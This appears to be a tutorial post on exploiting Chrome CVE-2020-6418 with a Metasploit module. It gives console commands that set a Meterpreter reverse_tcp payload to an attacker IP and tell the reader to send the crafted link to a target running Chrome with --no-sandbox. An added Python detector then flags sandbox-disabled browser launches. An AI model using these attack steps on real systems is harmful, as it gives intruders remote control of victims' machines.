Hello everyone. This post demonstrates exploitation of a Google Chrome vulnerability that occurred in version 80.0.3987.122: CVE-2020-6418, which allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. https://nvd.nist.gov/vuln/detail/CVE-2020-6418

The Metasploit Framework includes an exploit for this vulnerability, so let's search for modules related to Chrome and select the one we need.

msfconsole
search chrome //To Search modules related to chrome

Select and copy the exploit given below from the list:

use exploit/multi/browser/chrome_jscreate_sideeffect
set srvhost 192.168.43.19  //Attacker IP 
set uripath /

We also need to set a payload; we are targeting Windows 10 x64:

set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.43.19
exploit

Now we need to share the link that serves the crafted HTML with our target.

On the target system, make sure Chrome is launched with the no-sandbox option. To do that, open cmd, run the command start chrome --no-sandbox, and open the link.
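
Because the demonstration only works when Chrome is started with the sandbox disabled, a browser process carrying that switch is worth alerting on. The following is an added example, not code from the original post: it scans process-creation records for Chromium-based browsers launched with no-sandbox. The field names follow Sysmon Event ID 1; the sample events, the browser list and the function name are constructed assumptions.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Chromium-based browser binaries to watch (assumed list; extend as needed).
BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe"}

# Match the switch only as its own argument, so a URL that merely contains
# the text is ignored. One or two dashes and any case are accepted on
# purpose (assumption: over-matching is preferable to a miss).
NO_SANDBOX = re.compile(r"(?<!\S)-{1,2}no-sandbox(?=\s|=|$)", re.IGNORECASE)
CHILD_TYPE = re.compile(r"(?<!\S)--type=(\S+)", re.IGNORECASE)

CHROME = r'"C:\Program Files\Google\Chrome\Application\chrome.exe"'

# Constructed sample records using Sysmon Event ID 1 field names.
SAMPLE_EVENTS = [
    {"UtcTime": "2020-03-10 09:14:02", "Image": CHROME.strip('"'),
     "CommandLine": CHROME + " --no-sandbox",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"UtcTime": "2020-03-10 09:14:03", "Image": CHROME.strip('"'),
     "CommandLine": CHROME + " --type=renderer --no-sandbox --lang=en-US",
     "ParentImage": CHROME.strip('"')},
    {"UtcTime": "2020-03-10 09:20:41", "Image": CHROME.strip('"'),
     "CommandLine": CHROME + " https://example.test/?q=--no-sandbox",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"UtcTime": "2020-03-10 09:22:10", "Image": r"C:\Windows\notepad.exe",
     "CommandLine": "notepad.exe --no-sandbox",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

def find_unsandboxed(events):
    """Return one finding per browser process started without the sandbox."""
    findings = []
    for ev in events:
        image = basename(ev["Image"]).lower()
        cmd = ev["CommandLine"]
        if image not in BROWSERS or not NO_SANDBOX.search(cmd):
            continue
        child = CHILD_TYPE.search(cmd)
        findings.append({
            "time": ev["UtcTime"],
            "image": image,
            # Top-level launches carry no --type switch; children do.
            "role": child.group(1) if child else "browser",
            "parent": basename(ev["ParentImage"]).lower(),
        })
    return findings

if __name__ == "__main__":
    for f in find_unsandboxed(SAMPLE_EVENTS):
        print(f)
```

Findings with role "browser" identify the original launch and its parent process; the child-process entries show the switch propagating to renderers.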
